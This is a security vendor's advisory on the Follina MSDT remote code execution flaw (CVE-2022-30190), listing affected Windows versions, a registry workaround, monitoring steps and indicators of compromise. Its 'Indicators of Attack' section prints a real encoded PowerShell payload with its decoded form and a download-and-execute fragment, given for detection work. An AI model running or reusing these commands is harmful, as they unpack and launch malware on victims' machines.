Updated: June 9, 2022
Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert on addressing the Zero-day remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Microsoft Windows.
Exploit Overview
Determined Impact
- A remote code execution vulnerability exists when MSDT is called using the URL protocol from an application such as Word.
- An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change and delete data, or create new accounts in the context allowed by the user’s rights.
Exploitability
CVE-2022-30190 Affected Versions
| Affected Product Versions | ||||
|---|---|---|---|---|
| Windows Server 2012 R2 (Server Core installation) | Windows Server 2012 R2 | Windows Server 2012 (Server Core installation) | Windows Server 2012 | Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) |
| Windows Server 2008 for 32-bit Systems Service Pack 2 | Windows RT 8.1 | Windows 8.1 for x64-based systems | Windows 8.1 for 32-bit systems | Windows Server 2008 R2 for x64-based Systems Service Pack 1 |
| Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) | Windows Server 2008 for x64-based Systems Service Pack 2 | Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) | Windows 7 for x64-based Systems Service Pack 1 | Windows 7 for 32-bit Systems Service Pack 1 |
| Windows Server 2016 (Server Core installation) | Windows Server 2016 | Windows 10 Version 1607 for x64-based Systems | Windows 10 Version 1607 for 32-bit Systems | Windows 10 for x64-based Systems |
| Windows 10 for 32-bit Systems | Windows 10 Version 21H2 for x64-based Systems | Windows 10 Version 21H2 for ARM64-based Systems | Windows 10 Version 21H2 for 32-bit Systems | Windows 11 for ARM64-based Systems |
| Windows 11 for x64-based Systems | Windows Server, version 20H2 (Server Core Installation) | Windows 10 Version 20H2 for ARM64-based Systems | Windows 10 Version 20H2 for 32-bit Systems | Windows 10 Version 20H2 for x64-based Systems |
| Windows Server 2022 Azure Edition Core Hotpatch | Windows Server 2022 (Server Core installation) | Windows Server 2022 | Windows 10 Version 21H1 for 32-bit Systems | Windows 10 Version 21H1 for ARM64-based Systems |
| Windows 10 Version 21H1 for x64-based Systems | Windows Server 2019 (Server Core installation) | Windows Server 2019 | Windows 10 Version 1809 for ARM64-based Systems | Windows 10 Version 1809 for x64-based Systems |
| Windows 10 Version 1809 for 32-bit Systems | ||||
Mitigations/ Workarounds
| Mitigation/ Workaround | Steps to be followed |
|---|---|
| Disable the MSDT URL Protocol using these steps: | Run Command Prompt as Administrator.To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.Note: Disabling “Troubleshooting wizards” can be performed through GPO HKLM/SOFTWARE\Policies\Microsoft\Windows\Scripted Diagnostics – EnableDiagnostics – 0 |
| How to undo the workaround (it is applicable once the patch is available): | Run Command Prompt as Administrator.To restore the registry key, execute the command “reg import filename” |
Best practices to stay protected against CVE-2022-30190 exploits
- Ensure anti-malware is installed on all the hosts and signatures are up to date to detect/prevent office applications from spawning the unusual child processes.
- Ensure the Netsurion sensor is installed on all the hosts.
- Conduct phishing awareness training at regular intervals.
- Harden the email security gateway policies.
- Perform vulnerability assessment and scanning at regular intervals.
Netsurion Monitoring Solutions
The Security Operations Center (SOC) will be able to track the CVE-2022-30190 exploit attempts using logs via Saved Searches, Dashboards, Reports, and Netsurion Managed Open XDR services.
Note: To detect/analyze the pattern, the Netsurion sensor should be installed on all active systems.
- SOC updated available IOCs to the Netsurion Threat center, which will help detect CVE-2022-30190 related activities using existing Priority-1 Alerts.
- PowerShell anomaly alert will be helpful to detect the invoke expression activities.
- CVE-2022-30190 related saved searches, dashboards and reports will be used for tracking known patterns of malicious behavior.
- Customers with the Netsurion Endpoint Security service will be alerted and protected by detecting and blocking the PowerShell execution patterns.
Detection by Netsurion Vulnerability Management
The Vulnerability Management signature database is updated with CVE-2022-30190 signatures. MTP team will be able to identify and report vulnerable endpoints for the Customers with Netsurion Vulnerability Management subscription.
Indicators of Compromise (IoCs)
- The Netsurion Threat Center has been updated with identified bad MD5 hash values and IP addresses to detect the IP address communication and terminate process launches based on the unsafe list.
- Netsurion will continue to monitor for evidence of CVE-2022-30190 exploitation and to update this advisory to inform customers.
| IOC Type | Value |
|---|---|
| IP Address | 141.105.65.149 |
| MD5 Hash | 52945af1def85b171870b31fa4782e52 |
| 8ee8fe6f0226e346e224cd72c728157c | |
| 6bcee92ab337c9130f27143cc7be5a55 | |
| f531a7c270d43656e34d578c8e71bc39 | |
| 529c8f3d6d02ba996357aba535f688fc | |
| d313002804198b5af1e0b537799be348 | |
| Domain | xmlformats.com |
Indicators of Attack
A PowerShell encoded command with below parameters would clearly indicate an active compromise.
Encoded Command
JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==Powershell Commands
-nop, hidden , -w, “IEX (Invoke Expressions), ((new-object net.webclient).downloadstring
Decoded Command
$cmd = “c:\windows\system32\cmd.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe”;
Detection
SOC analysts are trained to identify and recognize these commands to triage further. If found to be a true positive, the customers are alerted immediately.
References
- https://www.cisa.gov/uscert/ncas/current-activity/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability
- https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis?referrer=blog
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
- https://github.com/JohnHammond/msdt-follina
- https://unit42.paloaltonetworks.com/cve-2022-30190-msdt-code-execution-vulnerability/
- https://lolbas-project.github.io/lolbas/Binaries/Msdt/
- https://isc.sans.edu/diary/28694
- https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/
- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/